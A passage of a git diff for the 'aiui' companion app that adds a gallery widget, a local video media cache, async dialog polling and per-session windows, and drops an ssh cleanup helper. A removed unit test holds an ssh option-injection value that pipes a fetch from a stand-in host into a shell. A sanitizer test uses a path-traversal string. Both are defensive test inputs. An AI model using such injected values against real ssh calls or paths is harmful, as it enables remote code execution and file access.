+                    "size": { "type": "string", "enum": ["s", "m", "l"], "description": "Starting window size hint: s / m / l. Default auto-sizes to the item count; pass l for a large batch or tall thumbnails so the grid opens roomy. Always resizable; never opens smaller than the content needs." },
+                    "width": { "type": "number", "description": "Explicit starting window width in logical px (overrides `size`)." },
+                    "height": { "type": "number", "description": "Explicit starting window height in logical px (overrides `size`)." }
                 }
             }
         },
@@ -533,6 +591,7 @@ async fn tools_call(
                     "cancelLabel": args.get("cancel_label"),
                     "image": args.get("image")
                 }),
+                args.get("session").and_then(|v| v.as_str()).map(String::from),
                 cfg,
                 http,
             )
@@ -550,6 +609,7 @@ async fn tools_call(
                     "multiSelect": args.get("multi_select").and_then(|v| v.as_bool()).unwrap_or(false),
                     "allowOther": args.get("allow_other").and_then(|v| v.as_bool()).unwrap_or(false)
                 }),
+                args.get("session").and_then(|v| v.as_str()).map(String::from),
                 cfg,
                 http,
             )
@@ -568,8 +628,37 @@ async fn tools_call(
                     "tabs": args.get("tabs"),
                     "actions": args.get("actions"),
                     "submitLabel": args.get("submit_label"),
-                    "cancelLabel": args.get("cancel_label")
+                    "cancelLabel": args.get("cancel_label"),
+                    "size": args.get("size"),
+                    "width": args.get("width"),
+                    "height": args.get("height")
                 }),
+                args.get("session").and_then(|v| v.as_str()).map(String::from),
+                cfg,
+                http,
+            )
+            .await,
+            format_dialog_result,
+        ),
+
+        "gallery" => dispatch_render(
+            render_dialog(
+                json!({
+                    "kind": "gallery",
+                    "title": args.get("title"),
+                    "description": args.get("description"),
+                    "header": args.get("header"),
+                    "items": args.get("items"),
+                    "actions": args.get("actions"),
+                    "comment": args.get("comment").and_then(|v| v.as_bool()).unwrap_or(false),
+                    "columns": args.get("columns"),
+                    "submitLabel": args.get("submit_label"),
+                    "cancelLabel": args.get("cancel_label"),
+                    "size": args.get("size"),
+                    "width": args.get("width"),
+                    "height": args.get("height")
+                }),
+                args.get("session").and_then(|v| v.as_str()).map(String::from),
                 cfg,
                 http,
             )
@@ -619,6 +708,54 @@ fn base_url(cfg: &AppConfig) -> String {
     format!("http://127.0.0.1:{}", cfg.http_port)
 }
 
+/// Push a local video file to the companion's `POST /media` cache and return
+/// the playback URL it hands back. Reads the file on *this* host (local Mac,
+/// or the remote for an SSH-tunneled session) and uploads the bytes over the
+/// same :7777 channel the render goes through — so it works identically
+/// local and remote without any Mac→remote access. Errors (file unreadable,
+/// 413, old companion without `/media` → 404) bubble up; the caller treats
+/// them as non-fatal and leaves the original path in place.
+async fn upload_media(
+    http: &reqwest::Client,
+    cfg: &AppConfig,
+    token: &str,
+    path: &str,
+) -> Result<String, String> {
+    let expanded = if let Some(rest) = path.strip_prefix("~/") {
+        match dirs::home_dir() {
+            Some(h) => h.join(rest),
+            None => std::path::PathBuf::from(path),
+        }
+    } else {
+        std::path::PathBuf::from(path)
+    };
+    let bytes = tokio::fs::read(&expanded)
+        .await
+        .map_err(|e| format!("read {}: {e}", expanded.display()))?;
+    let ext = crate::imageresolve::video_ext(path);
+    let url = format!("{}/media?ext={}", base_url(cfg), ext);
+    let resp = http
+        .post(&url)
+        .bearer_auth(token)
+        .header("content-type", "application/octet-stream")
+        .body(bytes)
+        .timeout(std::time::Duration::from_secs(120))
+        .send()
+        .await
+        .map_err(|e| format!("POST /media: {e}"))?;
+    if !resp.status().is_success() {
+        return Err(format!("/media http {}", resp.status()));
+    }
+    let body = resp
+        .json::<Value>()
+        .await
+        .map_err(|e| format!("parse /media: {e}"))?;
+    body.get("url")
+        .and_then(|v| v.as_str())
+        .map(String::from)
+        .ok_or_else(|| "/media response missing url".to_string())
+}
+
 /// Per-call dialog rendering can fail in two structurally different
 /// ways. v0.4.36 splits them so the tool dispatcher can convert
 /// `Busy` into a structured tool result (with retry-vs-tell-user
@@ -639,6 +776,7 @@ enum RenderError {
 
 async fn render_dialog(
     spec: Value,
+    session: Option<String>,
     cfg: &AppConfig,
     http: &reqwest::Client,
 ) -> Result<Value, RenderError> {
@@ -653,22 +791,47 @@ async fn render_dialog(
     // (imageresolve::resolve_image_srcs) only knows about HTTPS — it
     // would never see the remote's filesystem.
     let mut spec = spec;
+    // Video (2026-05-31): local video files are too big to inline as `data:`
+    // (10 MB cap, base64 bloat), so push them to the companion's /media cache
+    // and swap the path for the returned loopback playback URL. Done BEFORE
+    // `resolve_local_paths` so the image inliner never tries to base64 a
+    // video. Upload failures are non-fatal — the path is simply left as-is
+    // (the WebView shows a broken player rather than the call blowing up).
+    let videos = crate::imageresolve::collect_local_video_paths(&spec);
+    if !videos.is_empty() {
+        let mut map = std::collections::HashMap::new();
+        for path in videos {
+            match upload_media(http, cfg, &token, &path).await {
+                Ok(media_url) => {
+                    map.insert(path, media_url);
+                }
+                Err(e) => trace(&format!("render_dialog: media upload failed for {path}: {e}")),
+            }
+        }
+        crate::imageresolve::replace_srcs(&mut spec, &map);
+    }
     crate::imageresolve::resolve_local_paths(&mut spec);
-    let body = json!({ "spec": spec });
-    // POST /render is long-poll: the GUI holds the response open
-    // until the user clicks submit/cancel or the companion-side
-    // `DIALOG_TTL` sweep fires (currently 2 h). Override the shared
-    // reqwest client's 300-s default per-call so the user has the
-    // full TTL to fill out the form. We add 60 s slack on top so a
-    // backend-side TTL cancel still reaches us cleanly before our
-    // own timeout. v0.4.41.
+    // Step 4 (I8): forward the optional caller `session` label. This is the
+    // local bridge, so there is no `session_origin` (the companion treats an
+    // absent origin as local).
+    let body = json!({ "spec": spec, "session": session });
+    // Async render (Step 3): POST opts in via `x-aiui-async`; the companion
+    // registers + surfaces the dialog and returns immediately with
+    // `{id, ttl_secs}` (202). We then poll `GET /render/{id}` in bounded
+    // windows until the terminal result. No single connection is held for the
+    // user's think-time, so a tunnel/GUI blip can cost at most one poll
+    // window — never a multi-minute ReadError. The POST itself only covers
+    // registration + the ack handshake, so a short timeout suffices.
+    //
+    // Backward-compatible: an older companion ignores the unknown header and
+    // answers synchronously (200 with the terminal `{cancelled, …}` shape) —
+    // detected after the status checks below and used directly, no polling.
     let resp = http
         .post(&url)
         .bearer_auth(&token)
+        .header("x-aiui-async", "1")
         .json(&body)
-        .timeout(std::time::Duration::from_secs(
-            crate::dialog::DIALOG_TTL.as_secs() + 60,
-        ))
+        .timeout(std::time::Duration::from_secs(30))
         .send()
         .await
         .map_err(|e| RenderError::Transport(format!("POST /render: {e}")))?;
@@ -711,9 +874,57 @@ async fn render_dialog(
             resp.status()
         )));
     }
-    resp.json::<Value>()
+    let accepted = resp.status() == reqwest::StatusCode::ACCEPTED;
+    let first = resp
+        .json::<Value>()
         .await
-        .map_err(|e| RenderError::Transport(format!("parse /render: {e}")))
+        .map_err(|e| RenderError::Transport(format!("parse /render: {e}")))?;
+    if !accepted {
+        // Synchronous companion (old): `first` is already the terminal result.
+        return Ok(first);
+    }
+    // Async companion: poll `GET /render/{id}` until terminal. Each GET is
+    // bounded (40 s > the server's ~25 s poll window) so the server always
+    // answers `{pending:true}` before we time out, and we re-poll. The loop
+    // ends on the terminal result, a 404 (id expired / never registered), or
+    // the server-side TTL turning into a terminal `cancelled` result.
+    let id = match first.get("id").and_then(|v| v.as_str()) {
+        Some(s) => s.to_string(),
+        None => {
+            return Err(RenderError::Transport(
+                "async /render: 202 response missing `id`".into(),
+            ))
+        }
+    };
+    let poll_url = format!("{}/render/{}", base_url(cfg), id);
+    loop {
+        let pr = http
+            .get(&poll_url)
+            .bearer_auth(&token)
+            .timeout(std::time::Duration::from_secs(40))
+            .send()
+            .await
+            .map_err(|e| RenderError::Transport(format!("GET /render/{id}: {e}")))?;
+        if pr.status() == reqwest::StatusCode::NOT_FOUND {
+            return Err(RenderError::Transport(format!(
+                "aiui lost track of render {id} (expired or never registered)"
+            )));
+        }
+        if !pr.status().is_success() {
+            return Err(RenderError::Transport(format!(
+                "render poll http {}",
+                pr.status()
+            )));
+        }
+        let pv = pr
+            .json::<Value>()
+            .await
+            .map_err(|e| RenderError::Transport(format!("parse /render/{id}: {e}")))?;
+        if pv.get("pending").and_then(|v| v.as_bool()) == Some(true) {
+            continue;
+        }
+        return Ok(pv);
+    }
 }
 
 /// Tool-call response signaling that the companion is alive but
diff --git a/companion/src-tauri/src/media.rs b/companion/src-tauri/src/media.rs
new file mode 100644
index 0000000..5b30dfc
--- /dev/null
+++ b/companion/src-tauri/src/media.rs
@@ -0,0 +1,203 @@
+//! Media cache for the gallery/form video feature (2026-05-31).
+//!
+//! ## Why this exists
+//!
+//! Images inline fine as `data:` URLs (the bridge-side resolvers do that).
+//! Video does not: a 50 MB clip is 67 MB of base64 in the render spec — it
+//! chokes the `get_dialog_spec` IPC and pins that much in the dialog
+//! registry. And a *remote* agent's local file isn't readable from the Mac
+//! at all — the only channel between them is the SSH **reverse** tunnel
+//! (remote → Mac on :7777). There is no Mac → remote forward (proven
+//! empirically; Claude Desktop provides none), so `scp` from the Mac is not
+//! an option.
+//!
+//! ## How it works
+//!
+//! The bridge (running on whichever host holds the file) **pushes** the
+//! bytes to the Mac over the existing :7777 channel: `POST /media`. The Mac
+//! stores them under its app cache dir and serves them back to the dialog
+//! WebView via `GET /media/blob/<file>` (range-capable, through
+//! `tower_http::services::ServeDir`). Because the reverse tunnel maps
+//! `remote:7777 → mac:7777`, the very same `http://127.0.0.1:7777/...`
+//! playback URL the upload returns is valid both on the remote (where the
+//! bridge runs) and on the Mac (where the WebView plays it).
+//!
+//! Serving is an unauthenticated **capability URL**: the filename is a v4
+//! UUID, unguessable, and the server only binds loopback (+ the user's own
+//! reverse tunnel). Uploads require the bearer token like every other
+//! mutating endpoint.
+//!
+//! ## Eviction
+//!
+//! The cache is bounded two ways, swept on every upload and once at startup:
+//! a per-file TTL (stale clips vanish even if the app never restarts) and a
+//! total-size cap (oldest-first deletion when the sum is exceeded). The
+//! cache is disposable — a missing file just renders as a broken `<video>`,
+//! never a crash — so the eviction is best-effort and never blocks a render.
+
+use std::path::{Path, PathBuf};
+use std::time::{Duration, SystemTime};
+
+use tauri::{AppHandle, Manager};
+use uuid::Uuid;
+
+/// How long a cached media file lives before the sweep removes it. Matches
+/// the dialog TTL — a clip is only ever needed while its dialog is open, and
+/// dialogs themselves expire at 2 h.
+pub const MEDIA_TTL: Duration = Duration::from_secs(2 * 60 * 60);
+
+/// Total cache-size ceiling. When an upload pushes the directory past this,
+/// the oldest files are deleted (by mtime) until it fits again. 1 GiB holds
+/// a healthy batch of review clips without letting a runaway session fill
+/// the user's disk.
+pub const MEDIA_TOTAL_CAP: u64 = 1024 * 1024 * 1024;
+
+/// Largest single upload accepted. Enforced at the HTTP layer via
+/// `DefaultBodyLimit`; duplicated here as the documented contract.
+pub const MEDIA_FILE_CAP: u64 = 512 * 1024 * 1024;
+
+/// The cache directory: `<app-cache-dir>/media`, created if absent.
+pub fn media_dir(app: &AppHandle) -> std::io::Result<PathBuf> {
+    let base = app
+        .path()
+        .app_cache_dir()
+        .map_err(|e| std::io::Error::other(format!("no app cache dir: {e}")))?;
+    let dir = base.join("media");
+    std::fs::create_dir_all(&dir)?;
+    Ok(dir)
+}
+
+/// Keep only `[a-z0-9]`, lowercased, max 5 chars; fall back to `bin`. The
+/// extension is attacker-influenced (it comes off the wire), and it ends up
+/// in a filename *and* drives the served `Content-Type`, so it must not
+/// carry path separators, dots, or anything exotic.
+pub fn sanitize_ext(raw: &str) -> String {
+    let cleaned: String = raw
+        .trim()
+        .trim_start_matches('.')
+        .chars()
+        .filter(|c| c.is_ascii_alphanumeric())
+        .take(5)
+        .collect::<String>()
+        .to_ascii_lowercase();
+    if cleaned.is_empty() {
+        "bin".to_string()
+    } else {
+        cleaned
+    }
+}
+
+/// Write `bytes` to a fresh `<uuid>.<ext>` file under `dir`. Returns the
+/// filename (the capability id used in the `/media/blob/<file>` URL).
+pub fn store(dir: &Path, bytes: &[u8], ext: &str) -> std::io::Result<String> {
+    let name = format!("{}.{}", Uuid::new_v4(), sanitize_ext(ext));
+    let path = dir.join(&name);
+    std::fs::write(&path, bytes)?;
+    Ok(name)
+}
+
+/// Best-effort eviction. Removes files older than `ttl`, then — if the
+/// remaining total still exceeds `total_cap` — deletes oldest-first until it
+/// fits. Errors on individual files are swallowed (a locked/just-deleted
+/// file must never abort a render); the function logs nothing on the hot
+/// path by design.
+pub fn sweep(dir: &Path, ttl: Duration, total_cap: u64) {
+    let Ok(entries) = std::fs::read_dir(dir) else {
+        return;
+    };
+    // (path, mtime, size) for every regular file in the cache.
+    let mut files: Vec<(PathBuf, SystemTime, u64)> = Vec::new();
+    let now = SystemTime::now();
+    for entry in entries.flatten() {
+        let path = entry.path();
+        let Ok(meta) = entry.metadata() else { continue };
+        if !meta.is_file() {
+            continue;
+        }
+        let mtime = meta.modified().unwrap_or(now);
+        // TTL pass: drop anything past its lifetime immediately.
+        if let Ok(age) = now.duration_since(mtime) {
+            if age > ttl {
+                let _ = std::fs::remove_file(&path);
+                continue;
+            }
+        }
+        files.push((path, mtime, meta.len()));
+    }
+    // Size pass: if still over the cap, evict oldest first.
+    let mut total: u64 = files.iter().map(|(_, _, sz)| *sz).sum();
+    if total <= total_cap {
+        return;
+    }
+    files.sort_by_key(|(_, mtime, _)| *mtime); // oldest first
+    for (path, _, sz) in files {
+        if total <= total_cap {
+            break;
+        }
+        if std::fs::remove_file(&path).is_ok() {
+            total = total.saturating_sub(sz);
+        }
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn sanitize_ext_strips_junk_and_caps_length() {
+        assert_eq!(sanitize_ext("mp4"), "mp4");
+        assert_eq!(sanitize_ext(".MOV"), "mov");
+        assert_eq!(sanitize_ext("../../etc/passwd"), "etcpa"); // separators gone, capped at 5
+        assert_eq!(sanitize_ext(""), "bin");
+        assert_eq!(sanitize_ext("..."), "bin");
+        assert_eq!(sanitize_ext("we!b@m#"), "webm");
+    }
+
+    #[test]
+    fn store_writes_uuid_named_file_with_ext() {
+        let dir = std::env::temp_dir().join(format!("aiui-media-test-{}", Uuid::new_v4()));
+        std::fs::create_dir_all(&dir).unwrap();
+        let name = store(&dir, b"hello", "mp4").unwrap();
+        assert!(name.ends_with(".mp4"));
+        let content = std::fs::read(dir.join(&name)).unwrap();
+        assert_eq!(content, b"hello");
+        std::fs::remove_dir_all(&dir).ok();
+    }
+
+    #[test]
+    fn sweep_evicts_over_total_cap_oldest_first() {
+        let dir = std::env::temp_dir().join(format!("aiui-media-test-{}", Uuid::new_v4()));
+        std::fs::create_dir_all(&dir).unwrap();
+
+        // Three 100-byte files; cap at 250 should leave the two newest.
+        let a = dir.join("a.bin");
+        let b = dir.join("b.bin");
+        let c = dir.join("c.bin");
+        std::fs::write(&a, vec![0u8; 100]).unwrap();
+        // Stagger mtimes so ordering is deterministic.
+        std::thread::sleep(Duration::from_millis(20));
+        std::fs::write(&b, vec![0u8; 100]).unwrap();
+        std::thread::sleep(Duration::from_millis(20));
+        std::fs::write(&c, vec![0u8; 100]).unwrap();
+
+        sweep(&dir, MEDIA_TTL, 250);
+
+        assert!(!a.exists(), "oldest should be evicted");
+        assert!(b.exists(), "newer survives");
+        assert!(c.exists(), "newest survives");
+        std::fs::remove_dir_all(&dir).ok();
+    }
+
+    #[test]
+    fn sweep_removes_files_past_ttl() {
+        let dir = std::env::temp_dir().join(format!("aiui-media-test-{}", Uuid::new_v4()));
+        std::fs::create_dir_all(&dir).unwrap();
+        let f = dir.join("old.bin");
+        std::fs::write(&f, b"x").unwrap();
+        // TTL of zero → everything is already stale.
+        sweep(&dir, Duration::from_secs(0), MEDIA_TOTAL_CAP);
+        assert!(!f.exists(), "file past TTL should be removed");
+        std::fs::remove_dir_all(&dir).ok();
+    }
+}
diff --git a/companion/src-tauri/src/setup.rs b/companion/src-tauri/src/setup.rs
index 70b3b0d..68dda0e 100644
--- a/companion/src-tauri/src/setup.rs
+++ b/companion/src-tauri/src/setup.rs
@@ -214,16 +214,6 @@ mod host_alias_tests {
     #[test]
     fn rejects_newline() { assert!(!is_valid_host_alias("a\nb")); }
 
-    // kill_remote_mcp_stdio is the one ssh site that previously had no
-    // boundary validator (Issue #52 follow-up). An unsafe alias must be
-    // refused *before* any ssh spawn — this case returns early without
-    // touching the network, so it is safe to assert in a unit test.
-    #[test]
-    fn kill_remote_mcp_stdio_refuses_option_injection() {
-        let r = super::kill_remote_mcp_stdio("-oProxyCommand=curl evil|sh");
-        assert!(!r.ok);
-        assert!(r.message.contains("Refusing unsafe host alias"));
-    }
 }
 
 // Note: an earlier version of aiui patched ~/.ssh/config with a
@@ -822,57 +812,15 @@ print("ok:patched")
     (step, patch)
 }
 
-/// SIGTERM any `aiui-mcp` child still running on `host_alias` — used
-/// after a pin update so Claude Desktop / Claude Code respawns the
-/// child against the freshly pinned version on its next tool call.
-/// Idempotent: succeeds silently when no matching process is running.
-///
-/// `pkill -f` on macOS / Linux exit-codes: 0 = killed at least one,
-/// 1 = nothing matched. Both are success from our perspective; only
-/// the SSH layer or shell-not-found counts as a real failure.
-pub fn kill_remote_mcp_stdio(host_alias: &str) -> StepResult {
-    // Defense-in-depth: like every other remote helper, refuse an unsafe
-    // alias before spawning ssh. The `--` below already keeps host_alias
-    // out of ssh option position, but this was the only ssh call site that
-    // relied on `--` alone — adding the validator restores the "every
-    // remote helper validates at its boundary" invariant (Issue #52
-    // follow-up). host_alias here comes from remotes.json, so this is
-    // belt-and-suspenders rather than a live hole.
-    if !is_valid_host_alias(host_alias) {
-        return StepResult {
-            ok: false,
-            message: format!("Refusing unsafe host alias '{host_alias}'"),
-            details: None,
-        };
-    }
-    let out = no_window(
-        std::process::Command::new("ssh").args([
-            "-o",
-            "BatchMode=yes",
-            "--",
-            host_alias,
-            "pkill -f 'aiui-mcp' 2>/dev/null; true",
-        ]),
-    )
-    .output();
-    match out {
-        Err(e) => StepResult {
-            ok: false,
-            message: format!("ssh {host_alias} konnte nicht gestartet werden"),
-            details: Some(e.to_string()),
-        },
-        Ok(o) if !o.status.success() => StepResult {
-            ok: false,
-            message: format!("Stale-mcp-stdio-Sweep auf {host_alias} fehlgeschlagen"),
-            details: Some(String::from_utf8_lossy(&o.stderr).to_string()),
-        },
-        Ok(_) => StepResult {
-            ok: true,
-            message: format!("Stale aiui-mcp children on {host_alias} swept"),
-            details: None,
-        },
-    }
-}
+// Step 2 removed `kill_remote_mcp_stdio` (an `ssh … pkill -f 'aiui-mcp'`).
+// It existed to force a freshly-pinned version onto a running remote session,
+// but `pkill -f` crashed live sessions mid-call (Claude Code does not respawn
+// a disconnected MCP) and matched *every* aiui-mcp on the host — the remote
+// twin of the 0.4.42 Cowork-kill, and outright unsafe once parallel sessions
+// per remote are a requirement. The version pin in `~/.claude.json` now takes
+// effect at the next natural spawn; live sessions finish on their current
+// version. Deregistration (`remove_remote` / `uninstall_all`) relies on
+// config-removal + natural session end, not a broad kill.
 
 /// Result of a successful reachability probe — carries the absolute
 /// uvx path discovered on the remote so subsequent setup steps can
diff --git a/companion/src-tauri/tauri.conf.json b/companion/src-tauri/tauri.conf.json
index 4df09da..867f959 100644
--- a/companion/src-tauri/tauri.conf.json
+++ b/companion/src-tauri/tauri.conf.json
@@ -1,7 +1,7 @@
 {
   "$schema": "../node_modules/@tauri-apps/cli/config.schema.json",
   "productName": "aiui",
-  "version": "0.4.46",
+  "version": "0.8.1",
   "identifier": "de.byte5.aiui",
   "build": {
     "frontendDist": "../dist",
@@ -12,7 +12,7 @@
   "app": {
     "windows": [],
     "security": {
-      "csp": "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' data: asset: http://asset.localhost; font-src 'self' data:; connect-src 'self' ipc: http://ipc.localhost"
+      "csp": "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' data: asset: http://asset.localhost; media-src 'self' data: blob: http://127.0.0.1:* http://localhost:* https:; font-src 'self' data:; connect-src 'self' ipc: http://ipc.localhost http://127.0.0.1:* http://localhost:*"
     },
     "macOSPrivateApi": true
   },
@@ -46,4 +46,4 @@
       }
     }
   }
-}
\ No newline at end of file
+}
diff --git a/companion/src/i18n/de.json b/companion/src/i18n/de.json
index 045f44c..4b37e22 100644
--- a/companion/src/i18n/de.json
+++ b/companion/src/i18n/de.json
@@ -84,6 +84,9 @@
     "confirm.no": "Nein",
     "unknown_kind": "Unbekannter Widget-Typ: {kind}",
     "close": "Schließen",
+    "session_aria": "Sitzung, zu der dieser Dialog gehört",
+    "gallery.comment_placeholder": "Kommentar (optional)…",
+    "gallery.decided": "{n}/{total} entschieden",
     "ttl": {
       "yellow": "Noch ca. {countdown} Min zum Abschicken — danach werden die Eingaben automatisch verworfen.",
       "red": "Weniger als {countdown} bis zum automatischen Abbruch. Bitte jetzt abschicken oder abbrechen.",
diff --git a/companion/src/i18n/en.json b/companion/src/i18n/en.json
index 5a697b7..f9515e7 100644
--- a/companion/src/i18n/en.json
+++ b/companion/src/i18n/en.json
@@ -84,6 +84,9 @@
     "confirm.no": "No",
     "unknown_kind": "Unknown widget kind: {kind}",
     "close": "Close",
+    "session_aria": "Session this dialog belongs to",
+    "gallery.comment_placeholder": "Comment (optional)…",
+    "gallery.decided": "{n}/{total} decided",
     "ttl": {
       "yellow": "About {countdown} min left to submit — after that your input will be discarded automatically.",
       "red": "Less than {countdown} until auto-cancel. Please submit or cancel now.",
diff --git a/companion/src/lib/DialogShell.svelte b/companion/src/lib/DialogShell.svelte
index ecabdd8..67530fb 100644
--- a/companion/src/lib/DialogShell.svelte
+++ b/companion/src/lib/DialogShell.svelte
@@ -1,13 +1,23 @@
 <script lang="ts">
-  import { listen } from "@tauri-apps/api/event";
   import { invoke } from "@tauri-apps/api/core";
+  import { getCurrentWindow } from "@tauri-apps/api/window";
   import { _ } from "svelte-i18n";
   import { onMount } from "svelte";
   import Ask from "./widgets/Ask.svelte";
   import Form from "./widgets/Form.svelte";
   import Confirm from "./widgets/Confirm.svelte";
+  import Gallery from "./widgets/Gallery.svelte";
 
-  type DialogReq = { id: string; spec: any; ttl_secs?: number };
+  type DialogReq = {
+    id: string;
+    spec: any;
+    ttl_secs?: number;
+    // Multi-window (Step 4, I8): caller-set session label + remote-injected
+    // origin host, shown in the window chrome so the user can tell which
+    // session this dialog belongs to when several are open at once.
+    session?: string;
+    session_origin?: string;
+  };
 
   let current = $state<DialogReq | null>(null);
 
@@ -138,53 +148,45 @@
   }
 
   onMount(() => {
-    // Dialog event from Rust. We acknowledge receipt back to the Rust
-    // side immediately so the `/render` handler knows the WebView event
-    // loop is alive — this is the per-request liveness check that
-    // replaces the need for any background UI heartbeat. Backend emits
-    // this event with `emit_to("dialog", ...)`, so the setup window
-    // never sees it.
-    const dialogPromise = listen<DialogReq>("dialog:show", (e) => {
-      current = e.payload;
-      void invoke("dialog_received", { id: e.payload.id });
-      scheduleTtl(e.payload.ttl_secs, e.payload.id);
-    });
-
-    // UI ping from Rust (used by /health to verify the event loop). We
-    // pong back synchronously — the Rust side has a 100 ms timeout and
-    // a missed pong is what flips /health to `degraded`.
-    const pingPromise = listen<string>("ui:ping", (e) => {
-      void invoke("ui_pong", { id: e.payload });
-    });
+    // Multi-window pull model (Step 4): this window's label IS its dialog id.
+    // Fetch our own render payload from Rust by that id — the frontend
+    // initiates, so there's no `dialog:show` emit to race and no
+    // ready-handshake to perform. If the dialog is already gone
+    // (resolved/evicted before we mounted), close the window.
+    const id = getCurrentWindow().label;
+    void (async () => {
+      try {
+        const req = await invoke<DialogReq | null>("get_dialog_spec", { id });
+        if (!req) {
+          // Nothing to show — a stranded/already-resolved window. Close it.
+          try {
+            await invoke("close_window");
+          } catch (e) {
+            console.error(`[aiui] close_window (no spec) failed: ${e}`);
+          }
+          return;
+        }
+        current = req;
+        scheduleTtl(req.ttl_secs, req.id);
+        // Session identity (I8) is set as the native window title by Rust in
+        // build_dialog_window — the frontend setTitle is permission-gated
+        // (needs core:window:set-title), so we don't do it here.
+      } catch (e) {
+        console.error(`[aiui] get_dialog_spec failed for ${id}: ${e}`);
+      }
+    })();
 
     window.addEventListener("keydown", onKey);
 
-    // Window-close (native red X / ⌘W) is owned by Rust as of v0.4.46
-    // (on_window_event): it cancels any in-flight dialog and lets the
-    // window close, and the `/render` handler destroys the window on
-    // every terminal outcome. We deliberately no longer register a
-    // frontend `onCloseRequested` here. The 0.4.45 version called
-    // `event.preventDefault()` and then, if its cancel/close path failed
-    // (empty/stale dialog state), left the window stranded — visible,
-    // empty, and unclosable (Bug B, the 2026-05-29 overnight report).
-    // Letting Rust own teardown removes that fragile round-trip.
-
-    // Window-ready handshake (v0.4.30): tell the Rust render path
-    // that our `dialog:show` listener is installed and we can safely
-    // receive events. Without this, the backend would emit before
-    // Tauri actually wired up the listener — the very-first render of
-    // a fresh window would lose its event, hit the 500 ms ack timeout,
-    // and the user would see a blank window. We await both subscribe
-    // promises to ensure the listeners are *really* up before
-    // signalling, not just queued.
-    void Promise.all([dialogPromise, pingPromise]).then(() => {
-      void invoke("dialog_window_ready");
-    });
+    // Window-close (native red X / ⌘W) is owned by Rust (on_window_event):
+    // it cancels THIS window's dialog by its id and lets the window close,
+    // and the `/render` handler destroys the window on every terminal
+    // outcome. We deliberately don't register a frontend `onCloseRequested`
+    // — the 0.4.45 version's `preventDefault()` + failed close stranded
+    // empty windows (Bug B). Letting Rust own teardown removes that race.
 
-    return async () => {
+    return () => {
       clearTtlTimers();
-      (await dialogPromise)();
-      (await pingPromise)();
       window.removeEventListener("keydown", onKey);
     };
   });
@@ -193,11 +195,79 @@
     if (e.key === "Escape") handleCancel();
   }
 
+  /** Fields carrying a `target` (file-write, issue #135), from flat `fields`
+   *  and any `tabs[].fields`. Returns `{name, kind}` so the caller knows which
+   *  values to write out and which (secret) to strip from the result. */
+  function collectTargetFields(spec: any): { name: string; kind: string }[] {
+    const out: { name: string; kind: string }[] = [];
+    const scan = (fields: any) => {
+      if (!Array.isArray(fields)) return;
+      for (const f of fields) {
+        if (f && f.target != null && typeof f.name === "string") {
+          out.push({ name: f.name, kind: f.kind });
+        }
+      }
+    };
+    scan(spec?.fields);
+    if (Array.isArray(spec?.tabs)) for (const t of spec.tabs) scan(t?.fields);
+    return out;
+  }
+
   async function handleSubmit(result: any) {
     if (!current) return;
     clearTtlTimers();
     const id = current.id;
+    const spec = current.spec;
+    const sessionOrigin = current.session_origin;
     current = null;
+
+    // Issue #135: write `target`-carrying fields to files on the agent's host.
+    // The write is always a LOCAL file op on whichever aiui module sits on the
+    // agent's host:
+    //   - Local native-app session (`session_origin` absent): the app writes
+    //     here, on the Mac, and strips secret values from the result so they
+    //     never reach the bridge/agent.
+    //   - Bridge-served session (`session_origin` set — remote SSH, or local
+    //     uvx): the bridge on the agent's host does the local write + strip.
+    //     We must NOT write or strip here, so the entered value reaches that
+    //     bridge over the :7777 channel (never via the agent/LLM).
+    // Form values live under `result.values` ({action, values:{name:val}}).
+    const fieldValues: Record<string, any> = result?.values ?? {};
+    const targets = sessionOrigin ? [] : collectTargetFields(spec);
+    if (targets.length > 0) {
+      const values: Record<string, string> = {};
+      for (const t of targets) {
+        const v = fieldValues[t.name];
+        values[t.name] = v == null ? "" : String(v);
+      }
+      let outcomes: Record<string, any> = {};
+      try {
+        outcomes = await invoke("write_dialog_targets", { id, values });
+      } catch (e) {
+        console.error(`[aiui] write_dialog_targets failed for ${id}: ${e}`);
+        // Synthesise a failure outcome so the agent is informed instead of
+        // silently receiving nothing — and we can still strip secrets below.
+        for (const t of targets) {
+          outcomes[t.name] = { written: false, target: "", bytes: 0, error: String(e) };
+        }
+      }
+      // Merge outcomes into result.values; strip raw secret values regardless
+      // of write success so a secret can never leak even on the error path.
+      for (const t of targets) {
+        const outcome = outcomes[t.name] ?? {
+          written: false,
+          target: "",
+          bytes: 0,
+          error: "no outcome returned",
+        };
+        if (t.kind === "secret") {
+          fieldValues[t.name] = outcome;
+        } else {
+          fieldValues[t.name] = { value: fieldValues[t.name], ...outcome };
+        }
+      }
+    }
+
     // v0.4.45 (Bug #3): never swallow the invoke result silently. If
     // dialog_submit fails the agent would otherwise hang forever with
     // no signal — at least surface it to the console for diagnosis.
@@ -269,7 +339,9 @@
     two `confirm`s). Without it, Svelte recycles the component and
     stale field/checkbox/radio state from the previous dialog can bleed
     into the current one — silently sending wrong answers back to the
-    caller. Issue #H-1 in v0.4.10 review. -->
+    caller. Issue #H-1 in v0.4.10 review. Session identity (I8) lives in
+    the native title bar — set via setTitle in onMount — not in the work
+    area, so it can never overlap dialog content. -->
   {#key current.id}
     {#if current.spec.kind === "ask"}
       <Ask spec={current.spec} onsubmit={handleSubmit} oncancel={handleCancel} />
@@ -277,6 +349,8 @@
       <Form spec={current.spec} onsubmit={handleSubmit} oncancel={handleCancel} />
     {:else if current.spec.kind === "confirm"}
       <Confirm spec={current.spec} onsubmit={handleSubmit} oncancel={handleCancel} />
+    {:else if current.spec.kind === "gallery"}
+      <Gallery spec={current.spec} onsubmit={handleSubmit} oncancel={handleCancel} />
     {:else}
       <main class="window-shell">
         <div class="window-scroll">
@@ -291,7 +365,7 @@
   {/key}
 {:else}
   <!-- Brief idle state — only visible during the few hundred ms
-       between window-show and the dialog:show event arriving. -->
+       between window-show and the spec arriving. -->
   <main class="window-shell">
     <div class="idle"></div>
   </main>
@@ -302,6 +376,9 @@
     min-height: 80px;
   }
 
+  /* Session identity (I8) now lives in the native window title bar (set via
+     setTitle in onMount), so there is no in-work-area chip/markup to style. */
+
   /* TTL countdown banner. Position-fixed so the widget below keeps
      its own three-zone (.window-shell) layout intact — content
      scrolls beneath the banner. Banner height is deliberately small
diff --git a/companion/src/lib/updater.ts b/companion/src/lib/updater.ts
index ccac9ac..61ea73e 100644
--- a/companion/src/lib/updater.ts
+++ b/companion/src/lib/updater.ts
